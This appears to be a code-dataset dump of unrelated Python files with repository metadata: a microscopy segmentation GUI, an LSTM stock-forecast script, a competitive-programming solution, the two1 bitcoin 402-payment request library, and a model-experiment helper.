print("erro - no h5 file found.")
return False
# Custom IoU metric
def mean_iou(y_true, y_pred):
prec = []
for t in np.arange(0.5, 1.0, 0.05):
y_pred_ = tf.to_int32(y_pred > t)
score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)
K.get_session().run(tf.local_variables_initializer())
with tf.control_dependencies([up_opt]):
score = tf.identity(score)
prec.append(score)
return K.mean(K.stack(prec), axis=0)
# Custom loss function
def dice_coef(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def bce_dice_loss(y_true, y_pred):
return 0.5 * keras.losses.binary_crossentropy(y_true, y_pred) - dice_coef(y_true, y_pred)
# Load model and parameters
# l1 = 1.
# l2 = -1.
# loss1 = binary_crossentropy
# loss2 = dice_coef_loss_K
# def custom_loss(y_true,y_pred):
# return l1*loss1(y_true,y_pred)+l2*loss2(y_true,y_pred)
# # net = load_model(self.model[0],custom_objects={'custom_loss':custom_loss}) #v0
net = load_model(self.model[0],custom_objects={'bce_dice_loss': bce_dice_loss, 'mean_iou': mean_iou}) #v1
nx = int(net.input.get_shape()[1])
ny = int(net.input.get_shape()[2])
TIME = int(net.input.get_shape()[3])
if LSTM:
nx = int(net.input.get_shape()[2])
ny = int(net.input.get_shape()[3])
TIME = int(net.input.get_shape()[1])
else:
nx = int(net.input.get_shape()[1])
ny = int(net.input.get_shape()[2])
TIME = int(net.input.get_shape()[3])
if TIME>self.im.shape[0]:
raise ValueError('Require at least {0} images, {1} given. This is important since the segmentation used teporal information.'.format(TIME,self.im.shape[0]))
# Make data in time batch
nb_serie = int(self.finish+1)//TIME
im_batch = np.zeros((nb_serie, nx, ny, TIME), dtype=np.float32)
masks = np.zeros((nx, ny, self.finish+1), dtype=np.float32)
for i in range(nb_serie):
tmp = np.array(self.im_nn[i*TIME:(i+1)*TIME].copy(),dtype=np.float32)
for t in range(TIME):
im_batch[i,:,:,t] = resize(tmp[t], (nx,ny), mode='constant', preserve_range=True)
# im_batch[i] = np.array(np.iinfo(type_im).max*(np.array(im_batch[i],dtype=np.float64)-np.min(im_batch[i]))/(np.max(im_batch[i])-np.min(im_batch[i])),dtype=type_im)
# if nb_serie >0:
# im_batch = np.iinfo(type_im).max*(im_batch- np.min(im_batch))/(np.max(im_batch)-np.min(im_batch))
im_batch = np.expand_dims(np.array(im_batch, dtype=np.float32),4)
if LSTM:
im_batch = np.rollaxis(im_batch,3,1)
# Compute mask for the first time batchs
masks = np.zeros((self.finish+1,self.im.shape[1],self.im.shape[2]))
for i in range(nb_serie):
print("Neural network progress : {0}%.".format(int(100*i/nb_serie)))
tmp = np.array(np.expand_dims(im_batch[i],0),dtype=np.float32)/np.iinfo(type_im).max
masks_ = np.array(np.squeeze(net.predict(tmp)),dtype=np.float32)
# masks_ = np.squeeze(tmp)
if LSTM:
# TODO: check this part
for t in range(TIME):
masks[i*TIME+t] = resize(masks_[t],(self.im.shape[1],self.im.shape[2]), mode='constant', preserve_range=True)
else:
for t in range(TIME):
# masks[i*TIME+t] = np.squeeze(self.im[TIME*i+t])
masks[i*TIME+t] = resize(masks_[:,:,t],(self.im.shape[1],self.im.shape[2]), mode='constant', preserve_range=True)
# Compute mask for the remaining images
if self.finish != TIME*nb_serie:
tmp = np.array(self.im_nn[self.finish+1-TIME:].copy(),dtype=np.float32)
im_tmp = np.zeros((1,nx,ny,TIME,1))
for t in range(TIME):
im_tmp[0,:,:,t,0] = resize(tmp[t], (nx,ny), mode='constant', preserve_range=True)
# im_tmp[0] = np.array(np.iinfo(type_im).max*(np.array(im_tmp[0],dtype=np.float64)-np.min(im_tmp[0]))/(np.max(im_tmp[0])-np.min(im_tmp[0])),dtype=type_im)
im_tmp = np.array(im_tmp,dtype=np.float32)/np.iinfo(type_im).max
tmp = np.array(np.squeeze(net.predict(im_tmp)),dtype=np.float32)
for t in range((self.finish+1-nb_serie*TIME)):
masks[nb_serie*TIME+t] = resize(tmp[:,:,TIME-(self.finish-nb_serie*TIME)-1+t],(self.im.shape[1],self.im.shape[2]), mode='constant', preserve_range=True)
# Save masks in same folder than images
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'masks')):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'masks'))
for i in range(self.finish+1):
tmp = np.array(np.iinfo(type_save).max*(masks[i]>1e-7),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'masks',str(i).zfill(10)+'.png'),tmp)
print('Masks computed.')
self.masks_original = masks.copy()
self.masks = (self.masks_original > 0).astype(np.uint8)
if self.plot_mask != True:
self.plot_mask = True
self.p2 = self.win.addPlot(colspan=2)
self.img_m = pg.ImageItem(None, border="w")
self.p2.addItem(self.img_m)
self.maskLoaded = True
self.win.show()
self.w1_m = Slider_thresh(0,1)
self.horizontalLayout.addWidget(self.w1_m)
p1.setAspectLocked(ratioKept)
p1.autoRange()
self.p2.setAspectLocked(ratioKept)
self.p2.autoRange()
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
self.p2.setAspectLocked()
self.p2.autoRange()
self.w1_m.valueChangedX.connect(updateThresh)
updateThresh()
else:
self.p2.setAspectLocked(ratioKept)
self.p2.autoRange()
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
self.p2.setAspectLocked()
self.p2.autoRange()
self.w1_m.valueChangedX.connect(updateThresh)
def updateThresh():
self.masks = np.array(self.masks_original > self.w1_m.x,dtype=np.uint8)
updateImage()
# Get action of user
self.w2.isShooted.connect(shootingProcedure)
self.w2.isunShooted.connect(unShoot)
self.w2.isG1.connect(G1)
self.w2.isEarlyS.connect(earlyS)
self.w2.isMidS.connect(midS)
self.w2.isLateS.connect(lateS)
self.w2.isG2.connect(G2)
self.w2.isEnd.connect(end)
self.w2.isloadMasks.connect(loadMasks)
self.w2.iscomputeMasks.connect(computeMasks)
self.img = pg.ImageItem(None, border="w")
# self.img.setRect(QRect(100, 200, 11, 16))
p1.addItem(self.img)
# Custom ROI for selecting an image region (axis swaped)
self.roi = pg.ROI([20, 20], [int(self.ny/10), int(self.nx/10)])
self.roi.addScaleHandle([0.5, 1], [0.5, 0.001])
self.roi.addScaleHandle([0, 0.5], [0.999, 0.5])
self.roi.addScaleHandle([0.5, 0], [0.5, 0.999])
self.roi.addScaleHandle([1, 0.5], [0.001, 0.5])
# update when user change view
def updateImage():
self.data = self.im[self.w1.x]
self.img.setImage(np.rot90(self.data,3))
if self.maskLoaded:
self.img_m.setImage(np.rot90(self.masks[self.w1.x],3))
if self.Shooted:
# import ipdb.ipdb.set_trace()
self.img_crop.setImage(np.rot90(self.im_focus[self.w1.x],3))
self.w1.valueChangedX.connect(updateImage)
p1.addItem(self.roi)
self.roi.setZValue(10) # make sure ROI is drawn above image
# Contrast/color control
# hist = pg.HistogramLUTItem(fillHistogram=False)
# hist.setImageItem(self.img)
# self.win.addItem(hist)
self.img.setImage(np.rot90(self.data,3))
# hist.setLevels(self.data.min(), self.data.max())
p1.setAspectLocked()
p1.autoRange()
self.boundingBox = [None,None]
# Callbacks for handling user interaction
def updatePlot():
global img, roi, data
selected = self.roi.getArrayRegion(self.data, self.img)
self.boundingBox = [[int(self.roi.pos().x()),int(self.roi.pos().y())],\
[int(self.roi.pos().x()+self.roi.size().x()),int(self.roi.pos().y()+self.roi.size().y())]]
self.roi.sigRegionChanged.connect(updatePlot)
updatePlot()
def trackingProcedure():
self.start_tracking = self.w1.x
def endTrackingProcedure():
if self.Shooted:
self.end_tracking = self.w1.x
if not os.path.exists(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID))):
os.makedirs(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID)))
for k in range(self.start_tracking,self.end_tracking):
tmp = np.array(self.im_focus[k]*self.mask_crop[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID),'image_'+str(k).zfill(10)+'.png'),tmp)
if self.secondChannel:
tmp = np.array(self.im_channel_focus[k],dtype=np.float32)
tmp = np.array(np.iinfo(type_save).max*(tmp-tmp.min())/(tmp.max()-tmp.min()),dtype=type_save)
imageio.imsave(os.path.join(dir_file,'Outputs',file_name,'track',str(self.shootID),'image2_'+str(k).zfill(10)+'.png'),tmp)
else:
print('Not in shooting mode.')
self.w3 = InterfaceManagerButton()
self.horizontalLayout.addWidget(self.w3)
self.w3.isQuit.connect(quitProcedure)
self.w3.isChannel.connect(newChannelProcedure)
self.w3.isTrack.connect(trackingProcedure)
self.w3.isTrackEnd.connect(endTrackingProcedure)
# self.w3.iscomputeSpeed.connect(Speed)
# self.w3.iscomputeVolume.connect(Volume)
# self.w3.iscomputeStep.connect(Step)
def getInt(self,message):
d,okPressed=QInputDialog.getInt(self,message,'Value',30,1,1000,10)
if okPressed:
print(message)
print('Value: '+str(int(d)))
return int(d)
# Returns a byte-scaled image
def bytescale(data, cmin=None, cmax=None, high=255, low=0):
"""
Byte scales an array (image).
Byte scaling means converting the input image to uint8 dtype and scaling
the range to ``(low, high)`` (default 0-255).
If the input image already has dtype uint8, no scaling is done.
Parameters
----------
data : ndarray
PIL image data array.
cmin : scalar, optional
Bias scaling of small values. Default is ``data.min()``.
cmax : scalar, optional
Bias scaling of large values. Default is ``data.max()``.
high : scalar, optional
Scale max value to `high`. Default is 255.
low : scalar, optional
Scale min value to `low`. Default is 0.
Returns
-------
img_array : uint8 ndarray
The byte-scaled array.
Examples
--------
>>> from scipy.misc import bytescale
>>> img = np.array([[ 91.06794177, 3.39058326, 84.4221549 ],
... [ 73.88003259, 80.91433048, 4.88878881],
... [ 51.53875334, 34.45808177, 27.5873488 ]])
>>> bytescale(img)
array([[255, 0, 236],
[205, 225, 4],
[140, 90, 70]], dtype=uint8)
>>> bytescale(img, high=200, low=100)
array([[200, 100, 192],
[180, 188, 102],
[155, 135, 128]], dtype=uint8)
>>> bytescale(img, cmin=0, cmax=255)
array([[91, 3, 84],
[74, 81, 5],
[52, 34, 28]], dtype=uint8)
"""
if data.dtype == np.uint8:
return data
if high < low:
raise ValueError("`high` should be larger than `low`.")
if cmin is None:
cmin = data.min()
if cmax is None:
cmax = data.max()
cscale = cmax - cmin
if cscale < 0:
raise ValueError("`cmax` should be larger than `cmin`.")
elif cscale == 0:
cscale = 1
scale = float(high - low) / cscale
bytedata = (data * 1.0 - cmin) * scale + 0.4999
bytedata[bytedata > high] = high
bytedata[bytedata < 0] = 0
return np.array(bytedata,dtype=np.uint8) + np.array(low,dtype=np.uint8)
class SecondWindow(QtGui.QWidget):
def __init__(self,parent):
QtGui.QWidget.__init__(self,parent)
self.button=QtGui.QPushButton("my button !")
layout=QtGui.QHBoxLayout()
layout.addWidget(self.button)
self.setLayout(layout)
self.show()
# Interpret image data as row-major instead of col-major
# pg.setConfigOptions(imageAxisOrder='row-major')
# pg.mkQApp()
# win = pg.GraphicsLayoutWidget()
# win.setWindowTitle('pyqtgraph example: Image Analysis')
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Widget()
w.show()
sys.exit(app.exec_()) | lebrat/Biolapse | tracking/GUI.py | GUI.py | py | 46,183 | python | en | code | 0 | github-code | 90 |
29439792833 | # Import necessary libraries
import yfinance as yf
import numpy as np
from sklearn.preprocessing import MinMaxScaler
import tensorflow as tf
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from sklearn.metrics import mean_squared_error
from datetime import datetime, timedelta
end_date = datetime.today().strftime('%Y-%m-%d')
start_date = (datetime.today() - timedelta(days=700)).strftime('%Y-%m-%d')
data = yf.download("SPY", start=start_date, end=end_date, interval="1h")
close_prices = data['Close'].values.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
scaled_data = scaler.fit_transform(close_prices)
sequence_length = 60
prediction_length = 168
X, y = [], []
for i in range(sequence_length, len(scaled_data)-prediction_length):
X.append(scaled_data[i-sequence_length:i, 0])
y.append(scaled_data[i:i+prediction_length, 0])
X, y = np.array(X), np.array(y)
train_size = int(0.8 * len(X))
X_train, X_test = X[:train_size], X[train_size:]
y_train, y_test = y[:train_size], y[train_size:]
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))
def create_model(lstm_units, dropout_rate):
model = Sequential()
model.add(LSTM(units=lstm_units, return_sequences=True, input_shape=(X_train.shape[1], 1)))
model.add(Dropout(dropout_rate))
model.add(LSTM(units=lstm_units, return_sequences=True))
model.add(Dropout(dropout_rate))
model.add(LSTM(units=lstm_units))
model.add(Dropout(dropout_rate))
model.add(Dense(units=prediction_length))
model.compile(optimizer='adam', loss='mean_squared_error')
return model
lstm_units_list = [30, 50, 80]
dropout_rates = [0.1, 0.2, 0.3]
batch_sizes = [16, 32, 64]
best_model = None
best_score = float('inf')
for lstm_units in lstm_units_list:
for dropout_rate in dropout_rates:
for batch_size in batch_sizes:
print(f"Training with lstm_units={lstm_units}, dropout_rate={dropout_rate}, batch_size={batch_size}")
model = create_model(lstm_units, dropout_rate)
model.fit(X_train, y_train, epochs=10, batch_size=batch_size, validation_data=(X_test, y_test), verbose=0)
predictions = model.predict(X_test)
mse_score = mean_squared_error(y_test, predictions)
print(f"MSE Score: {mse_score}")
if mse_score < best_score:
best_score = mse_score
best_model = model
if best_score < 0.013:
break
if best_score < 0.013:
break
if best_score < 0.013:
break
print("\nBest Model:")
print(f"MSE Score: {best_score}")
print("Predicted prices for the next week (hourly):")
current_date = datetime.today() + timedelta(days=1)
for i in range(0, prediction_length, 24):
print("\nDate:", current_date.strftime('%Y-%m-%d'))
daily_prices = predictions[0][i:i+24]
for price in daily_prices:
print(f"{price:.2f}")
current_date += timedelta(days=1) | aidan-pantoya/TheTrack | refineLSTM.py | refineLSTM.py | py | 3,164 | python | en | code | 0 | github-code | 90 |
18353972049 | def resolve():
s = input()
t = input()
d = {}
for i, c in enumerate(list(s)):
d.setdefault(c, [])
d[c].append(i)
import bisect
nloops = 0
prev = -1
for c in list(t):
if c not in d:
print(-1)
return
# prevより後ろにあるcのうち、最も近いものの位置
cidx = bisect.bisect_left(d[c], prev)
if cidx < len(d[c]) and prev == d[c][cidx]:
cidx += 1
nearc = d[c][cidx] if cidx < len(d[c]) else None
if nearc is None:
nloops += 1
nearc = d[c][0]
prev = nearc
print(nloops*len(s)+prev+1)
if '__main__' == __name__:
resolve() | Aasthaengg/IBMdataset | Python_codes/p02937/s057881639.py | s057881639.py | py | 710 | python | en | code | 0 | github-code | 90 |
37565916920 | """This module provides various BitRequests methods, including:
`BitTransferRequests`, `OnChainRequests`, and `ChannelRequests`. These objects
can be used to make 402-enabled, paid HTTP requests to servers that
support the 402-protocol and those specific payment methods.
"""
import time
import json
import codecs
import logging
import requests
import urllib.parse
import two1
from two1.commands.util import config
import two1.commands.util.exceptions as exceptions
logger = logging.getLogger('bitrequests')
class BitRequestsError(Exception):
"""Generic exception for BitRequests modules."""
pass
class UnsupportedPaymentMethodError(BitRequestsError):
"""Raised when using a payment method that is not supported by a server."""
pass
class ResourcePriceGreaterThanMaxPriceError(BitRequestsError):
"""Raised when paying for a resource whose price exceeds the client's maximum allowable price."""
pass
class InsufficientBalanceError(BitRequestsError):
"""Raised when attempting to pay for a resource which has a price that exceedes the available balance."""
pass
class BitRequests(object):
"""Implements the HTTP 402 bitcoin payment protocol on the client side.
If an initial request returns '402: Payment Required', the class defers to
its `make_402_payment()` to create the necessary payment.
"""
def __init__(self):
"""Initialize BitRequests."""
pass
def make_402_payment(self, response, max_price):
"""Payment handling method implemented by a BitRequests subclass.
Args:
response (requests.response): 402 response from the API server.
max_price (int): maximum allowed price for a request (in satoshi).
Returns:
headers (dict):
dict of headers with payment data to send to the
API server to inform payment status for the resource.
"""
raise NotImplementedError()
def get_402_info(self, url):
"""Method for retrieving 402 metadata associated with the resource.
Args:
url (string): URL of the requested resource.
Returns:
headers (dict):
dict of headers from the resource.
Example: {'price': 5000, 'username': 'some_merchant'}
"""
raise NotImplementedError()
def _reset_file_positions(self, files, data):
"""Resets the `read` cursor position of a group of files.
This method will mutate all file-like objects in the `files` or `data`
parameters. It has no effect when `file` and `data` are None, or when
`data` is not a file type.
Args:
data (file): a file-like object.
files (dict or list): a key-value store of file identifiers and
file-like objects or tuples that contain file-like objects.
TODO: allow for `files` lists where there may be multiple values for
the same key, which currently collide when cast to a dict
"""
if files:
file_list = list(dict(files).values())
# Allow for one level of nesting for file fields
if isinstance(file_list[0], (list, tuple)):
file_list = [f[1] for f in file_list]
elif data:
file_list = [data]
else:
return
# Only seek through the objects if they are seekable
for f in file_list:
if hasattr(f, 'seek'):
f.seek(0)
def request(self, method, url, max_price=None, mock_requests=False, **kwargs):
"""Make a 402 request for a resource.
This is the BitRequests public method that should be used to complete a
402 request using the desired payment method (as constructed by a class
implementing BitRequests)
Args:
method (string): HTTP method for completing the request in lower-
case letters. Examples: 'get', 'post', 'put'
url (string): URL of the requested resource.
data (dict): python dict of parameters to send with the request.
max_price (int): maximum allowed price for a request (in satoshi).
Returns:
response (requests.response):
response from paying for the requested resource.
"""
if mock_requests:
fake_response = requests.models.Response()
fake_response.status_code = 200
fake_response._content = b''
return fake_response
# Make the initial request for the resource
response = requests.request(method, url, **kwargs)
# Return if we receive a status code other than 402: payment required
if response.status_code != requests.codes.payment_required:
return response
# Pass the response to the main method for handling payment
logger.debug('[BitRequests] 402 payment required: {} satoshi.'.format(
response.headers['price']))
payment_headers = self.make_402_payment(response, max_price)
# Reset the position of any files that have been used
self._reset_file_positions(kwargs.get('files'), kwargs.get('data'))
# Add any user-provided headers to the payment headers dict
if 'headers' in kwargs:
if isinstance(kwargs['headers'], dict):
kwargs['headers'].update(payment_headers)
else:
raise ValueError('argument \'headers\' must be a dict.')
else:
kwargs['headers'] = payment_headers
paid_response = requests.request(method, url, **kwargs)
setattr(paid_response, 'amount_paid', int(response.headers['price']))
if paid_response.status_code == requests.codes.ok:
logger.debug('[BitRequests] Successfully purchased resource.')
else:
logger.debug('[BitRequests] Could not purchase resource.')
return paid_response
def get(self, url, max_price=None, **kwargs):
"""Make a paid GET request for a resource."""
return self.request('get', url, max_price, **kwargs)
def put(self, url, max_price=None, **kwargs):
"""Make a paid PUT request for a resource."""
return self.request('put', url, max_price, **kwargs)
def post(self, url, max_price=None, **kwargs):
"""Make a paid POST request for a resource."""
return self.request('post', url, max_price, **kwargs)
def delete(self, url, max_price=None, **kwargs):
"""Make a paid DELETE request for a resource."""
return self.request('delete', url, max_price, **kwargs)
def head(self, url, max_price=None, **kwargs):
"""Make a paid HEAD request for a resource."""
return self.request('head', url, max_price, **kwargs)
class BitTransferRequests(BitRequests):
"""BitRequests for making bit-transfer payments."""
HTTP_BITCOIN_PRICE = 'price'
HTTP_BITCOIN_ADDRESS = 'bitcoin-address'
HTTP_BITCOIN_USERNAME = 'username'
def __init__(self, wallet, username=None, client=None):
"""Initialize the bittransfer with wallet and username."""
from two1.server.machine_auth_wallet import MachineAuthWallet
from two1.server import rest_client
super().__init__()
if isinstance(wallet, MachineAuthWallet):
self.wallet = wallet
else:
self.wallet = MachineAuthWallet(wallet)
if username is None:
self.username = config.Config().username
else:
self.username = username
if client is None:
self.client = rest_client.TwentyOneRestClient(
two1.TWO1_HOST, self.wallet, self.username)
else:
self.client = client
def make_402_payment(self, response, max_price):
"""Make a bit-transfer payment to the payment-handling service."""
# Retrieve payment headers
headers = response.headers
price = headers.get(BitTransferRequests.HTTP_BITCOIN_PRICE)
payee_address = headers.get(BitTransferRequests.HTTP_BITCOIN_ADDRESS)
payee_username = headers.get(BitTransferRequests.HTTP_BITCOIN_USERNAME)
# Verify that the payment method is supported
if price is None or payee_address is None or payee_username is None:
raise UnsupportedPaymentMethodError(
'Resource does not support that payment method.')
# Convert string headers into correct data types
price = int(price)
# verify that we have the money to purchase the resource
buffer_balance = self.client.get_earnings()["total_earnings"]
if price > buffer_balance:
insuff_funds_err = 'Resource price ({}) exceeds buffer balance ({}).'
raise InsufficientBalanceError(insuff_funds_err.format(price, buffer_balance))
# Verify resource cost against our budget
if max_price and price > max_price:
max_price_err = 'Resource price ({}) exceeds max price ({}).'
raise ResourcePriceGreaterThanMaxPriceError(max_price_err.format(price, max_price))
# Get the signing public key
pubkey = self.wallet.get_public_key()
compressed_pubkey = codecs.encode(pubkey.compressed_bytes, 'base64').decode()
# Create and sign BitTranfer
bittransfer = json.dumps({
'payer': self.username,
'payer_pubkey': compressed_pubkey,
'payee_address': payee_address,
'payee_username': payee_username,
'amount': price,
'timestamp': time.time(),
'description': response.url
})
if not isinstance(bittransfer, str):
raise TypeError("Serialized bittransfer must be a string")
signature = self.wallet.sign_message(bittransfer)
logger.debug('[BitTransferRequests] Signature: {}'.format(signature))
logger.debug('[BitTransferRequests] BitTransfer: {}'.format(bittransfer))
return {
'Bitcoin-Transfer': bittransfer,
'Authorization': signature
}
def get_402_info(self, url):
"""Get bit-transfer payment information about the resource."""
headers = requests.get(url).headers
price = headers.get(BitTransferRequests.HTTP_BITCOIN_PRICE, 0)
payee_address = headers.get(BitTransferRequests.HTTP_BITCOIN_ADDRESS)
payee_username = headers.get(BitTransferRequests.HTTP_BITCOIN_USERNAME)
return {BitTransferRequests.HTTP_BITCOIN_PRICE: int(price),
BitTransferRequests.HTTP_BITCOIN_ADDRESS: payee_address,
BitTransferRequests.HTTP_BITCOIN_USERNAME: payee_username}
class OnChainRequests(BitRequests):
"""BitRequests for making on-chain payments."""
HTTP_BITCOIN_PRICE = 'price'
HTTP_BITCOIN_ADDRESS = 'bitcoin-address'
HTTP_PAYER_21USERNAME = 'Payer-21Username'
def __init__(self, wallet):
"""Initialize the on-chain request with a wallet."""
super().__init__()
self.wallet = wallet
try:
self.username = config.Config().username
except exceptions.FileDecodeError:
self.username = None
def make_402_payment(self, response, max_price):
"""Make an on-chain payment."""
# Retrieve payment headers
headers = response.headers
price = headers.get(OnChainRequests.HTTP_BITCOIN_PRICE)
payee_address = headers.get(OnChainRequests.HTTP_BITCOIN_ADDRESS)
# Verify that the payment method is supported
if price is None or payee_address is None:
raise UnsupportedPaymentMethodError(
'Resource does not support that payment method.')
# Convert string headers into correct data types
price = int(price)
# Verify resource cost against our budget
if max_price and price > max_price:
max_price_err = 'Resource price ({}) exceeds max price ({}).'
raise ResourcePriceGreaterThanMaxPriceError(max_price_err.format(price, max_price))
# Create the signed transaction
onchain_payment = self.wallet.make_signed_transaction_for(
payee_address, price, use_unconfirmed=True)[0].get('txn').to_hex()
return_address = self.wallet.current_address
logger.debug('[OnChainRequests] Signed transaction: {}'.format(
onchain_payment))
return {
'Bitcoin-Transaction': onchain_payment,
'Return-Wallet-Address': return_address,
OnChainRequests.HTTP_BITCOIN_PRICE: str(price),
OnChainRequests.HTTP_PAYER_21USERNAME: urllib.parse.quote(self.username) if self.username else None
}
def get_402_info(self, url):
"""Get on-chain payment information about the resource."""
headers = requests.get(url).headers
price = headers.get(OnChainRequests.HTTP_BITCOIN_PRICE)
payee_address = headers.get(OnChainRequests.HTTP_BITCOIN_ADDRESS)
return {OnChainRequests.HTTP_BITCOIN_PRICE: int(price),
OnChainRequests.HTTP_BITCOIN_ADDRESS: payee_address}
class ChannelRequests(BitRequests):
"""BitRequests for making channel payments."""
import two1.channels as channels # noqa
HTTP_BITCOIN_PRICE = 'price'
HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER = 'bitcoin-payment-channel-server'
HTTP_BITCOIN_PAYMENT_CHANNEL_TOKEN = 'bitcoin-payment-channel-token'
HTTP_PAYER_21USERNAME = 'Payer-21Username'
DEFAULT_DEPOSIT_AMOUNT = 100000
DEFAULT_DURATION = 86400 * 8
DEFAULT_ZEROCONF = True
DEFAULT_USE_UNCONFIRMED = False
def __init__(self, wallet, deposit_amount=DEFAULT_DEPOSIT_AMOUNT, duration=DEFAULT_DURATION):
"""Initialize the channel requests with a payment channel client."""
super().__init__()
self._channelclient = ChannelRequests.channels.PaymentChannelClient(wallet)
self._deposit_amount = deposit_amount
self._duration = duration
try:
self.username = config.Config().username
except exceptions.FileDecodeError:
self.username = None
def make_402_payment(self, response, max_price):
"""Make a channel payment."""
# Retrieve payment headers
price = response.headers.get(ChannelRequests.HTTP_BITCOIN_PRICE)
server_url = response.headers.get(ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER)
# Verify that the payment method is supported
if price is None or server_url is None:
raise UnsupportedPaymentMethodError(
'Resource does not support channels payment method.')
# Convert string headers into correct data types
price = int(price)
# Verify resource cost against our budget
if max_price and price > max_price:
max_price_err = 'Resource price ({}) exceeds max price ({}).'
raise ResourcePriceGreaterThanMaxPriceError(max_price_err.format(price, max_price))
# Look up channel
channel_urls = self._channelclient.list(server_url)
channel_url = channel_urls[0] if channel_urls else None
if channel_url:
# Get channel status
status = self._channelclient.status(channel_url)
# Check if channel has expired
if status.ready and status.expired:
logger.debug("[ChannelRequests] Channel expired. Refreshing channel.")
self._channelclient.sync(channel_url)
channel_url = None
# Check if the channel balance is sufficient
elif status.ready and status.balance < price:
logger.debug("[ChannelRequests] Channel balance low. Refreshing channel.")
self._channelclient.close(channel_url)
status = self._channelclient.status(channel_url)
logger.debug("[ChannelRequests] Channel spend txid is {}".format(status.spend_txid))
channel_url = None
# Check if the channel deposit is still being confirmed
elif status.state == ChannelRequests.channels.PaymentChannelState.CONFIRMING_DEPOSIT:
logger.debug("[ChannelRequests] Channel deposit tx still being confirmed.")
self._channelclient.sync(channel_url)
status = self._channelclient.status(channel_url)
if not status.ready:
raise ChannelRequests.channels.NotReadyError("Channel not ready.")
# Open a new channel if we don't have a usable one
if not channel_url or not status.ready:
logger.debug("[ChannelRequests] Opening channel at {} with deposit {}.".format(
server_url, self._deposit_amount))
channel_url = self._channelclient.open(
server_url, self._deposit_amount, self._duration,
zeroconf=ChannelRequests.DEFAULT_ZEROCONF, use_unconfirmed=ChannelRequests.DEFAULT_USE_UNCONFIRMED)
status = self._channelclient.status(channel_url)
logger.debug("[ChannelRequests] Channel deposit txid is {}".format(status.deposit_txid))
# Pay through the channel
logger.debug("[ChannelRequests] Paying channel {} with amount {}.".format(channel_url, price))
try:
token = self._channelclient.pay(channel_url, price)
except ChannelRequests.channels.ClosedError:
# If the server closed the channel, restart payment process to
# negotiate a new channel.
return self.make_402_payment(response, max_price)
return {
ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_TOKEN: token,
ChannelRequests.HTTP_BITCOIN_PRICE: str(price),
ChannelRequests.HTTP_PAYER_21USERNAME: urllib.parse.quote(self.username) if self.username else None,
}
def get_402_info(self, url):
"""Get channel payment information about the resource."""
response = requests.get(url)
price = response.headers.get(ChannelRequests.HTTP_BITCOIN_PRICE)
channel_url = response.headers.get(ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER)
return {ChannelRequests.HTTP_BITCOIN_PRICE: price,
ChannelRequests.HTTP_BITCOIN_PAYMENT_CHANNEL_SERVER: channel_url}
| 21dotco/two1-python | two1/bitrequests/bitrequests.py | bitrequests.py | py | 18,360 | python | en | code | 366 | github-code | 90 |
72663369897 | import pandas as pd
import utils as u
import evaluate as evl
import math
from typing import List, Dict
from sklearn.preprocessing import PolynomialFeatures
from termcolor import cprint
def run_model_experiments(
model_obj,
model_name: str,
feat_train: pd.DataFrame,
target_train: pd.Series,
feature_sets_dict: Dict[str, List],
metrics_list: List,
is_poly: bool = False
) -> List[Dict]:
""" Run model experiments for different feature sets.
Args:
model_obj: model object to run experiments on.
model_name: name of the model.
feat_train: training dataframe with features.
target_train: training series with target variable.
feature_sets_dict: dict of all feature sets to experiment on.
metrics_List: list to append experiment results in.
is_poly: bool value for whether there needs to be polynomial
transformation.
Returns:
List of experiment scoring results.
"""
if is_poly == True:
model_pipeline = u.create_model_pipeline(model_obj, is_poly=True)
model_pipeline.steps.insert(2, ['poly_transform', PolynomialFeatures(2)])
else:
model_pipeline = u.create_model_pipeline(model_obj)
for i, (feature_set_name, feature_set) in enumerate(feature_sets_dict.items()):
metrics_dict = {}
metrics_dict['model_name'] = model_name
metrics_dict['feature_set'] = feature_set_name
cprint(f'[TRAINING] {model_name} ------', color = 'red')
select_feat_train = feat_train[feature_set]
scores = evl.get_cross_val_scores(
select_feat_train,
target_train,
model_pipeline
)
metrics_dict['train_mse_mean'] = math.sqrt(-(scores['train_neg_mean_squared_error'].mean()))
metrics_dict['test_mse_mean'] = math.sqrt(-(scores['test_neg_mean_squared_error'].mean()))
metrics_dict['train_mse_std'] = math.sqrt((scores['train_neg_mean_squared_error'].std()))
metrics_dict['test_mse_std'] = math.sqrt((scores['test_neg_mean_squared_error'].std()))
metrics_dict['train_mae_mean'] = -(scores['train_neg_mean_absolute_error'].mean())
metrics_dict['test_mae_mean'] = -(scores['test_neg_mean_absolute_error'].mean())
metrics_dict['train_mae_std'] = (scores['train_neg_mean_absolute_error'].std())
metrics_dict['test_mae_std'] = (scores['test_neg_mean_absolute_error'].std())
metrics_dict['train_r2_mean'] = (scores['train_r2'].mean())
metrics_dict['test_r2_mean'] = (scores['test_r2'].mean())
metrics_dict['train_r2_std'] = (scores['train_r2'].std())
metrics_dict['test_r2_std'] = (scores['test_r2'].std())
metrics_list.append(metrics_dict)
cprint(f'[EXP {i}] {feature_set_name} [DONE]', color = 'green')
return metrics_list | chhaviarora95/house-price-prediction | src/model_experiments.py | model_experiments.py | py | 2,945 | python | en | code | 0 | github-code | 90 |
18180835579 | import sys
sys.setrecursionlimit(10**7)
input = sys.stdin.readline
